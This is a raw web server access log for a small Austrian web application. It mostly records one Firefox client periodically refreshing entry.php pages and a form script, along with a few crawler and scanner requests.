178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /gui/javascript/form_form.js?1735290247 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /gui/javascript/form_form.js?1735290247 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /gui/javascript/form_form.js?1735290247 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /gui/javascript/form_form.js?1735290247 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:07 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2396 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:08 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:08 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:08 +0100] "GET /gui/javascript/form_form.js?1735290248 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:08 +0100] "GET /gui/javascript/form_form.js?1735290248 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:04:09 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1968 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:13 +0100] "GET /gui/javascript/form_form.js?1735290313 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:13 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2012 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:13 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:13 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2231 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:13 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:14 +0100] "GET /gui/images/icons/i_resourcenverwaltung.gif HTTP/1.1" 200 2102 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:14 +0100] "GET /gui/images/icons/artikelbearbeitung_verfassung.gif HTTP/1.1" 200 1719 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:14 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:38 +0100] "GET /entry.php?id=10828 HTTP/1.1" 200 9141 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:38 +0100] "GET /gui/javascript/form_form.js?1735290338 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:38 +0100] "GET /framework/icons/popupcalendar/right2.gif HTTP/1.1" 200 286 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:05:38 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1508 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:06:14 +0100] "GET /entry.php?id=10271&&ser=290313 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:06:14 +0100] "GET /gui/javascript/form_form.js?1735290374 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290313" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:07:14 +0100] "GET /entry.php?id=10271&&ser=290374 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290313" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:07:14 +0100] "GET /gui/javascript/form_form.js?1735290434 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290374" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:08:14 +0100] "GET /entry.php?id=10271&&ser=290434 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290374" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:08:14 +0100] "GET /gui/javascript/form_form.js?1735290494 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290434" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:09:14 +0100] "GET /entry.php?id=10271&&ser=290494 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=290434" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:09:15 +0100] "GET /gui/javascript/form_form.js?1735290555 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290494" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:10:15 +0100] "GET /entry.php?id=10271&&ser=290555 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290494" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:10:15 +0100] "GET /gui/javascript/form_form.js?1735290615 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290555" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:11:15 +0100] "GET /entry.php?id=10271&&ser=290615 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290555" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:11:15 +0100] "GET /gui/javascript/form_form.js?1735290675 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290615" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:12:15 +0100] "GET /entry.php?id=10271&&ser=290675 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=290615" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:12:15 +0100] "GET /gui/javascript/form_form.js?1735290735 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290675" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:13:16 +0100] "GET /entry.php?id=10271&&ser=290735 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290675" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:13:16 +0100] "GET /gui/javascript/form_form.js?1735290796 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290735" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:14:16 +0100] "GET /entry.php?id=10271&&ser=290796 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290735" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:14:16 +0100] "GET /gui/javascript/form_form.js?1735290856 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290796" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:15:16 +0100] "GET /entry.php?id=10271&&ser=290856 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290796" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:15:16 +0100] "GET /gui/javascript/form_form.js?1735290916 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290856" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:16:17 +0100] "GET /entry.php?id=10271&&ser=290916 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290856" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:16:17 +0100] "GET /gui/javascript/form_form.js?1735290977 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290916" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [27/Dec/2024:10:16:48 +0100] "GET /ed-test.activities.at/stats/lang/awstats-de.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [27/Dec/2024:10:17:09 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.165.191.42 - - [27/Dec/2024:10:17:17 +0100] "GET /entry.php?id=10271&&ser=290977 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290916" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:17:17 +0100] "GET /gui/javascript/form_form.js?1735291037 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=290977" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:18:17 +0100] "GET /entry.php?id=10271&&ser=291037 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=290977" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:18:17 +0100] "GET /gui/javascript/form_form.js?1735291097 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291037" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:19:17 +0100] "GET /entry.php?id=10271&&ser=291097 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291037" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:19:18 +0100] "GET /gui/javascript/form_form.js?1735291157 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291097" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:20:18 +0100] "GET /entry.php?id=10271&&ser=291157 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291097" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:20:18 +0100] "GET /gui/javascript/form_form.js?1735291218 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291157" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:21:18 +0100] "GET /entry.php?id=10271&&ser=291218 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291157" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:21:18 +0100] "GET /gui/javascript/form_form.js?1735291278 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291218" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:22:18 +0100] "GET /entry.php?id=10271&&ser=291278 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291218" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:22:18 +0100] "GET /gui/javascript/form_form.js?1735291338 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291278" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.16.39.9 - - [27/Dec/2024:10:22:46 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
178.165.191.42 - - [27/Dec/2024:10:23:19 +0100] "GET /entry.php?id=10271&&ser=291338 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291278" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:23:19 +0100] "GET /gui/javascript/form_form.js?1735291399 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291338" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:24:19 +0100] "GET /entry.php?id=10271&&ser=291399 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291338" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:24:19 +0100] "GET /gui/javascript/form_form.js?1735291459 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291399" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:25:19 +0100] "GET /entry.php?id=10271&&ser=291459 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291399" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:25:19 +0100] "GET /gui/javascript/form_form.js?1735291519 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291459" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:26:19 +0100] "GET /entry.php?id=10271&&ser=291519 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291459" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:26:20 +0100] "GET /gui/javascript/form_form.js?1735291580 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291519" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:27:20 +0100] "GET /entry.php?id=10271&&ser=291580 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291519" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:27:20 +0100] "GET /gui/javascript/form_form.js?1735291640 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291580" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:28:20 +0100] "GET /entry.php?id=10271&&ser=291640 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291580" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:28:20 +0100] "GET /gui/javascript/form_form.js?1735291700 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291640" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:29:20 +0100] "GET /entry.php?id=10271&&ser=291700 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=291640" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:29:20 +0100] "GET /gui/javascript/form_form.js?1735291760 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291700" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:30:21 +0100] "GET /entry.php?id=10271&&ser=291760 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=291700" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:30:21 +0100] "GET /gui/javascript/form_form.js?1735291821 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291760" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:31:21 +0100] "GET /entry.php?id=10271&&ser=291821 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=291760" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:31:21 +0100] "GET /gui/javascript/form_form.js?1735291881 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291821" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:32:21 +0100] "GET /entry.php?id=10271&&ser=291881 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=291821" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:32:21 +0100] "GET /gui/javascript/form_form.js?1735291941 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291881" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:33:21 +0100] "GET /entry.php?id=10271&&ser=291941 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=291881" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:33:22 +0100] "GET /gui/javascript/form_form.js?1735292002 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=291941" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:34:22 +0100] "GET /entry.php?id=10271&&ser=292002 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=291941" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:34:22 +0100] "GET /gui/javascript/form_form.js?1735292062 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=292002" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:35:22 +0100] "GET /entry.php?id=10271&&ser=292062 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=292002" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:35:22 +0100] "GET /gui/javascript/form_form.js?1735292122 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=292062" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:36:22 +0100] "GET /entry.php?id=10271&&ser=292122 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=292062" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:36:23 +0100] "GET /gui/javascript/form_form.js?1735292182 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=292122" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:37:23 +0100] "GET /entry.php?id=10271&&ser=292182 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=292122" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:37:23 +0100] "GET /gui/javascript/form_form.js?1735292243 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=292182" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:38:23 +0100] "GET /entry.php?id=10271&&ser=292243 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=292182" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:38:23 +0100] "GET /gui/javascript/form_form.js?1735292303 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=292243" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:39:23 +0100] "GET /entry.php?id=10271&&ser=292303 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=292243" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:39:23 +0100] "GET /gui/javascript/form_form.js?1735292363 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=292303" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
109.237.27.240 - - [27/Dec/2024:10:40:16 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
109.237.27.240 - - [27/Dec/2024:10:40:16 +0100] "\x16\x03\x01" 400 383 "-" "-"
109.237.27.240 - - [27/Dec/2024:10:40:16 +0100] "\x16\x03\x01" 400 383 "-" "-"
109.237.27.240 - - [27/Dec/2024:10:40:16 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.165.191.42 - - [27/Dec/2024:10:40:24 +0100] "GET /entry.php?id=10271&&ser=292363 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=292303" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:40:24 +0100] "GET /gui/javascript/form_form.js?1735292424 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=292363" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:41:24 +0100] "GET /entry.php?id=10271&&ser=292424 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=292363" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:41:24 +0100] "GET /gui/javascript/form_form.js?1735292484 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=292424" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [27/Dec/2024:10:42:24 +0100] "GET /entry.php?id=10271&&ser=292484 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=292424" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
